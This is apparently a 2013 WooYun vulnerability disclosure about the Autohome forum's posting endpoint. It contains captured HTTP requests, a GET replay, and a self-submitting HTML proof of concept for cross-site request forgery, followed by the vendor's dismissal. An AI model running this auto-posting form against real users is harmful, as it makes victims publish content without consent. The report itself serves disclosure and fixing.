乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2013-07-03: 细节已通知厂商并且等待厂商处理中 2013-07-06: 厂商已经主动忽略漏洞,细节向公众公开
RT
问题站点:ajax.club.autohome.com.cn
1.在论坛发布一个帖子并抓包,得到如下数据;
POST /Post/TopicPost?topicid=0&tbbs=c&tbbsid=2615&urlbbsid=2615&fake_bbsid=0 HTTP/1.1Host: ajax.club.autohome.com.cnUser-Agent: Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: zh-cn,zh;q=0.8,en-us;q=0.5,en;q=0.3Accept-Encoding: gzip, deflateReferer: http://ajax.club.autohome.com.cn/NewPost/Post?bbs=c&bbsId=2615&urlbbsId=2615&pvareaid=101465Cookie: Connection: keep-aliveContent-Type: application/x-www-form-urlencodedContent-Length: 519tTitle=H2%2C%B4%F3%BC%D2%B6%BC%C0%B4%CB%B5%CB%B5%C4%DC%B5%C8%B4%FD%B5%C4%BC%AB%CF%DE%CA%B1%BC%E4%CA%C7%B6%E0%BE%C3&tRequestSource=AutohomeClub&log_id=&ATopicContent=%CE%D2%D5%E2%D1%F9%B5%C4%8C%C5%CB%BF%CF%D6%D4%DA%CE%DE%B4%E6%BF%EE%A3%AC%BB%B9%D3%D0%B7%BF%B4%FB%A3%AC%CB%F9%D2%D4%C4%DC%B9%BB%B5%C8%B4%FD%A3%AC%B2%BB%D6%AA%B5%C0%B4%F3%BC%D2%CA%C7%D4%F5%C3%B4%CF%EB%B5%C4%A3%AC%C0%B4%CB%B5%CB%B5%B0%C9%A3%A1%3Cimg+class%3D%22spic%22+src%3D%22http%3A%2F%2Fx.autoimg.cn%2Fclub%2FPost%2Fimg%2Fsmiles%2F43.gif%22%3E&tNotify=1
2.发现这里对接口校验不严格,同GET方式提交请求;
http://ajax.club.autohome.com.cn/Post/TopicPost?topicid=0&tbbs=c&tbbsid=2615&urlbbsid=2615&fake_bbsid=0&tTitle=H2%2C%B4%F3%BC%D2%B6%BC%C0%B4%CB%B5%CB%B5%C4%DC%B5%C8%B4%FD%B5%C4%BC%AB%CF%DE%CA%B1%BC%E4%CA%C7%B6%E0%BE%C3&tRequestSource=AutohomeClub&log_id=&ATopicContent=%CE%D2%D5%E2%D1%F9%B5%C4%8C%C5%CB%BF%CF%D6%D4%DA%CE%DE%B4%E6%BF%EE%A3%AC%BB%B9%D3%D0%B7%BF%B4%FB%A3%AC%CB%F9%D2%D4%C4%DC%B9%BB%B5%C8%B4%FD%A3%AC%B2%BB%D6%AA%B5%C0%B4%F3%BC%D2%CA%C7%D4%F5%C3%B4%CF%EB%B5%C4%A3%AC%C0%B4%CB%B5%CB%B5%B0%C9%A3%A1%3Cimg+class%3D%22spic%22+src%3D%22http%3A%2F%2Fx.autoimg.cn%2Fclub%2FPost%2Fimg%2Fsmiles%2F43.gif%22%3E&tNotify=1
3.提交GET请求后成功发布一条帖子;
4.不光如此,系统未对referer进行校验,导致可通过CSRF发帖,例子POC如下;
<html><body><form id="mantou" name="mantou" action="http://ajax.club.autohome.com.cn/Post/TopicPost?topicid=0&tbbs=c&tbbsid=2615&urlbbsid=2615&fake_bbsid=0" method="POST"><input type="hidden" name="tTitle" value="your title!" /><input type="hidden" name="tRequestSource" value="AutohomeClub" /><input type="hidden" name="ATopicContent" value="your content!!!" /><input type="hidden" name="Notify" value="1" /><input type="submit" value="submit" /></form><script> document.mantou.submit();</script></body></html>
5.通过修改ID我们可在任意论坛发帖子,下面是运行POC后的效果截图,简单测试了下;
见详细说明
严格校验接口以及referer;
危害等级:无影响厂商忽略
忽略时间:2013-07-06 06:54
这个问题对我们基本没有影响,因为对于用户的权限判断在提交服务器后会做验证,多谢对汽车之家的支持。
暂无